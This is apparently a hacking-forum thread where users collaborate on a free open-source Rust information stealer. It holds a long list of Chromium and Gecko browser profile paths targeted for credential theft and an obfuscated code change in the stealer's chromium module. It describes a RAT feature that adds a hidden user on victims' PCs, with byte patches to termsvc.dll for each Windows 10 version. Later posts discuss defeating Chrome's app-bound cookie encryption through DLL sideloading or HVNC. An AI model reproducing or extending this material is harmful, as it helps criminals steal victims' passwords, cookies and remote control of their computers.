
FREE & opensrc Rust Stealer

Here's the list I have so far (pulled from different stealers on GitHub). Some programs don't have "User Data" in the path, so it doesn't find them. I want to hopefully add these other Gecko-based programs by implementing a search function similar to the way it does for Chrome (if possible). I'm willing to send crypto to buy someone helpful a beer.


"Thorium": "AppData\\Local\\Thorium\\User Data",
"Chrome": "AppData\\Local\\Google\\Chrome\\User Data",
"Chrome (x86)": "AppData\\Local\\Google(x86)\\Chrome\\User Data",
"Chrome SxS": "AppData\\Local\\Google\\Chrome SxS\\User Data",
"Maple": "AppData\\Local\\MapleStudio\\ChromePlus\\User Data",
"Iridium": "AppData\\Local\\Iridium\\User Data",
"7Star": "AppData\\Local\\7Star\\7Star\\User Data",
"CentBrowser": "AppData\\Local\\CentBrowser\\User Data",
"Chedot": "AppData\\Local\\Chedot\\User Data",
"Vivaldi": "AppData\\Local\\Vivaldi\\User Data",
"Kometa": "AppData\\Local\\Kometa\\User Data",
"Elements": "AppData\\Local\\Elements Browser\\User Data",
"Epic Privacy Browser": "AppData\\Local\\Epic Privacy Browser\\User Data",
"Uran": "AppData\\Local\\uCozMedia\\Uran\\User Data",
"Fenrir": "AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer",
"Catalina": "AppData\\Local\\CatalinaGroup\\Citrio\\User Data",
"Coowon": "AppData\\Local\\Coowon\\Coowon\\User Data",
"Liebao": "AppData\\Local\\liebao\\User Data",
"QIP Surf": "AppData\\Local\\QIP Surf\\User Data",
"Orbitum": "AppData\\Local\\Orbitum\\User Data",
"Dragon": "AppData\\Local\\Comodo\\Dragon\\User Data",
"360Browser": "AppData\\Local\\360Browser\\Browser\\User Data",
"Maxthon": "AppData\\Local\\Maxthon3\\User Data",
"K-Melon": "AppData\\Local\\K-Melon\\User Data",
"CocCoc": "AppData\\Local\\CocCoc\\Browser\\User Data",
"Brave": "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data",
"Amigo": "AppData\\Local\\Amigo\\User Data",
"Torch": "AppData\\Local\\Torch\\User Data",
"Sputnik": "AppData\\Local\\Sputnik\\Sputnik\\User Data",
"Edge": "AppData\\Local\\Microsoft\\Edge\\User Data",
"DCBrowser": "AppData\\Local\\DCBrowser\\User Data",
"Yandex": "AppData\\Local\\Yandex\\YandexBrowser\\User Data",
"UR Browser": "AppData\\Local\\UR Browser\\User Data",
"Slimjet": "AppData\\Local\\Slimjet\\User Data",
"Opera": "AppData\\Roaming\\Opera Software\\Opera Stable",
"OperaGX": "AppData\\Roaming\\Opera Software\\Opera GX Stable",
"ChromeBeta": "AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\",
"Edge": "AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\",
"Brave": "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\",
"Speed360": "AppData\\Local\\360chrome\\Chrome\\User Data\\Default\\",
"QQBrowser": "AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\",
"Sogou": "AppData\\Roaming\\SogouExplorer\\Webkit\\Default\\",



"Firefox": "AppData\\Roaming\\Mozilla\\Firefox\\Profiles",
"SeaMonkey": "AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles",
"Waterfox": "AppData\\Roaming\\Waterfox\\Profiles",
"K-Meleon": "AppData\\Roaming\\K-Meleon\\Profiles",
"Thunderbird": "AppData\\Roaming\\Thunderbird\\Profiles",
"IceDragon": "AppData\\Roaming\\Comodo\\IceDragon\\Profiles",
"Cyberfox": "AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles",
"BlackHaw": "AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\Profiles",
"Pale Moon": "AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles",
"Mercury": "AppData\\Roaming\\mercury\\Profiles",

Also I changed line 32 of chromium/mod.rs to add the other browsers:
if dir.file_name().to_string_lossy().contains(obfstr::obfstr!("User Data")) || dir.file_name().to_string_lossy().contains(obfstr::obfstr!("Opera")) || dir.file_name().to_string_lossy().contains(obfstr::obfstr!("Default"))
 
Ah, I see, then there is a need to change a few things.
 
You mean the RAT option? Yes, but check how it is working, because it will just create a new user on somebody's PC, and you will use RDP to connect to it, thus it will only work if the infected PC is running the Windows Pro version!!!
Code:
patch termsvc.dll to enable concurrent remote desktop sessions:

- Windows 10 version 1511         (November Update): This version replaces `8B 99 3C 06 00 00 8B B9 38 06 00 00` with `B8 00 01 00 00 89 81 38 06 00 00 90`. It can also use RDPWrap with the ini file that has the entries for `[10.0.10586.0]` and `[10.0.10586.0-SLInit]`.
- Windows 10 version 1607      (Anniversary Update): This version replaces `39 81 3C 06 00 00 0F 84 D5 FA FF FF` with `B8 00 01 00 00 89 81 38 06 00 00`. It can also use RDPWrap with the ini file that has the entries for `[10.0.14393.447]` and `[10.0.14393.447-SLInit]`.
- Windows 10 version 1703         (Creators Update): This version replaces `8B 99 3C 06 00 00 C7 FB FF FF FF FF` with `B8 F4 FF FF FF C7 FB F4 FF FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.15063.0]` and `[10.0.15063.0-SLInit]`.
- Windows 10 version 1709    (Fall Creators Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.16299.15]` and `[10.0.16299.15-SLInit]`.
- Windows 10 version 1803       (April 2018 Update): This version replaces `8B B9 FC FE FF FF E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.17134.1]` and `[10.0.17134.1-SLInit]`.
- Windows 10 version 1809     (October 2018 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.17763.1]` and `[10.0.17763.1-SLInit]`.
- Windows 10 version 1903         (May 2019 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.18362.53]`, `[10.0.18362.x64]`, and `[10.0.18362.x64-SLInit]`.
- Windows 10 version 1909    (November 2019 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.18362.x64+1909]`, `[10.0.18362.x64+1909-SLInit]`, and `[10.0.x64+1909-SLInit]`.
- Windows 10 version 2004         (May 2020 Update): This version replaces `39 81 3C 06 00 00 0F 84 5D 61 01 00` with `B8 00 01 00 00 89 81 38 06 00 00`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
- Windows 10 version 20H2     (October 2020 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
- Windows 10 version 21H1         (May 2021 Update): This version replaces `39 C1 E9 D4 FE FF FF` with `B8 F4 FF FF FF E9 D5 FE FF FF`. It can also use RDPWrap with the ini file that has the entries for `[10.0.19041.84]`, `[10.0.19041.84-SLInit]`, and `[10.0.x64+2004-SLInit]`.
 
Thanks a lot, I can implement it later.
 
https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html Will it mean that only running from a SYSTEM-privileged account will let you decrypt cookies? Or can it be bypassed by running from a real Chrome process (some DLL payload sideload from chrome.exe which will run the stealer)?

Or should we all just nvm? )) Because I just tested on Version 127.0.6533.88 (Official Build) (64-bit) - all OK (from admin, not SYSTEM).


Yes, they admit themselves it basically does nothing, and you can just use HVNC.
 
Here's another post by someone saying they got it working. TBH this is above my knowledge. I'm just dropping info here and hoping someone else can figure it out

I compiled it, but received a 203 error too.
It was compiled with g++ -o chrm.exe elevator_decrypt_key.cpp -lstdc++ -lole32 -loleaut32

Then I found in Local State:
"os_crypt":{"app_bound_encrypted_key":"QVBQQ.............AAAAAAAAAA"
Put it in app_bound...key.txt ---> QVBQQ.............AAAAAAAAAA
Run chrm.exe = get 302 error

But according to the Google docs the key should have the prefix APPB...

upd https://source.chromium.org/chromium/chromium/src/+/main:chrome/browser/os_crypt/README.md
According to that, I tried running from Program Files etc., but same, no success. Also I see that after running the program the Elevation Service stops.
 


same problem
 

